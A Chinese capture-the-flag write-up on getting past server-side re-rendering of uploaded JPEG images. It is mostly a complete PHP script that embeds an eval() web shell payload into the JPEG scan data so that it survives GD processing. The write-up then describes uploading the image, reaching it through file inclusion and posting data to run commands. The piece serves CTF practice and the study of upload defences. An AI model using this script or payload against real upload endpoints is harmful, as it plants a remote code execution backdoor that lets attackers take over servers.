1. 与上题一样,但是是jpg图片二次渲染,这里有很多玄学的问题,参考了多个师傅的文章,放在了本文末尾
    2. 因为自己选的jpg图片就没成功,很玄学,最后使用了国光师傅的jpg文件和教程,这里贴出来
      1.jpg
    3. 先将本图片进行上传,让服务器端进行二次渲染,把渲染之后的图片重新下载下来,保存为download.php.jpg图片,当然你也可以命名为其他的,为什么要先上传渲染一遍,因为玄学…
    4. 这里附上jpg二次渲染绕过的脚本
      ```php <?php $miniPayload = ‘<?=eval($_POST[1]);?>’;
    1. if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
    2.     die('php-gd is not installed');
    3. }
    5. if(!isset($argv[1])) {
    6.     die('php jpg_payload.php <jpg_name.jpg>');
    7. }
    9. set_error_handler("custom_error_handler");
    11. for($pad = 0; $pad < 1024; $pad++) {
    12.     $nullbytePayloadSize = $pad;
    13.     $dis = new DataInputStream($argv[1]);
    14.     $outStream = file_get_contents($argv[1]);
    15.     $extraBytes = 0;
    16.     $correctImage = TRUE;
    18.     if($dis->readShort() != 0xFFD8) {
    19.         die('Incorrect SOI marker');
    20.     }
    22.     while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
    23.         $marker = $dis->readByte();
    24.         $size = $dis->readShort() - 2;
    25.         $dis->skip($size);
    26.         if($marker === 0xDA) {
    27.             $startPos = $dis->seek();
    28.             $outStreamTmp =
    29.                 substr($outStream, 0, $startPos) .
    30.                 $miniPayload .
    31.                 str_repeat("\0",$nullbytePayloadSize) .
    32.                 substr($outStream, $startPos);
    33.             checkImage('_'.$argv[1], $outStreamTmp, TRUE);
    34.             if($extraBytes !== 0) {
    35.                 while((!$dis->eof())) {
    36.                     if($dis->readByte() === 0xFF) {
    37.                         if($dis->readByte !== 0x00) {
    38.                             break;
    39.                         }
    40.                     }
    41.                 }
    42.                 $stopPos = $dis->seek() - 2;
    43.                 $imageStreamSize = $stopPos - $startPos;
    44.                 $outStream =
    45.                     substr($outStream, 0, $startPos) .
    46.                     $miniPayload .
    47.                     substr(
    48.                         str_repeat("\0",$nullbytePayloadSize).
    49.                             substr($outStream, $startPos, $imageStreamSize),
    50.                         0,
    51.                         $nullbytePayloadSize+$imageStreamSize-$extraBytes) .
    52.                             substr($outStream, $stopPos);
    53.             } elseif($correctImage) {
    54.                 $outStream = $outStreamTmp;
    55.             } else {
    56.                 break;
    57.             }
    58.             if(checkImage('payload_'.$argv[1], $outStream)) {
    59.                 die('Success!');
    60.             } else {
    61.                 break;
    62.             }
    63.         }
    64.     }
    65. }
    66. unlink('payload_'.$argv[1]);
    67. die('Something\'s wrong');
    69. function checkImage($filename, $data, $unlink = FALSE) {
    70.     global $correctImage;
    71.     file_put_contents($filename, $data);
    72.     $correctImage = TRUE;
    73.     imagecreatefromjpeg($filename);
    74.     if($unlink)
    75.         unlink($filename);
    76.     return $correctImage;
    77. }
    79. function custom_error_handler($errno, $errstr, $errfile, $errline) {
    80.     global $extraBytes, $correctImage;
    81.     $correctImage = FALSE;
    82.     if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
    83.         if(isset($m[1])) {
    84.             $extraBytes = (int)$m[1];
    85.         }
    86.     }
    87. }
    89. class DataInputStream {
    90.     private $binData;
    91.     private $order;
    92.     private $size;
    94.     public function __construct($filename, $order = false, $fromString = false) {
    95.         $this->binData = '';
    96.         $this->order = $order;
    97.         if(!$fromString) {
    98.             if(!file_exists($filename) || !is_file($filename))
    99.                 die('File not exists ['.$filename.']');
    100.             $this->binData = file_get_contents($filename);
    101.         } else {
    102.             $this->binData = $filename;
    103.         }
    104.         $this->size = strlen($this->binData);
    105.     }
    107.     public function seek() {
    108.         return ($this->size - strlen($this->binData));
    109.     }
    111.     public function skip($skip) {
    112.         $this->binData = substr($this->binData, $skip);
    113.     }
    115.     public function readByte() {
    116.         if($this->eof()) {
    117.             die('End Of File');
    118.         }
    119.         $byte = substr($this->binData, 0, 1);
    120.         $this->binData = substr($this->binData, 1);
    121.         return ord($byte);
    122.     }
    124.     public function readShort() {
    125.         if(strlen($this->binData) < 2) {
    126.             die('End Of File');
    127.         }
    128.         $short = substr($this->binData, 0, 2);
    129.         $this->binData = substr($this->binData, 2);
    130.         if($this->order) {
    131.             $short = (ord($short[1]) << 8) + ord($short[0]);
    132.         } else {
    133.             $short = (ord($short[0]) << 8) + ord($short[1]);
    134.         }
    135.         return $short;
    136.     }
    138.     public function eof() {
    139.         return !$this->binData||(strlen($this->binData) === 0);
    140.     }
    141. }

    ?>

    
5.  `payload`可以自己更改,将服务器下载好的图片与php脚本放在一起,利用命令行,生成payload图片  
```shell
php jpg_payload.php download.php.jpg
    1. 然后进行上传图片,访问文件包含图片地址,抓包,post数据,命令执行
      image-20210721150545885.png

    参考文章:

    国光-国光的文件上传靶场知识总结

    南方师傅-web165

    二次渲染绕过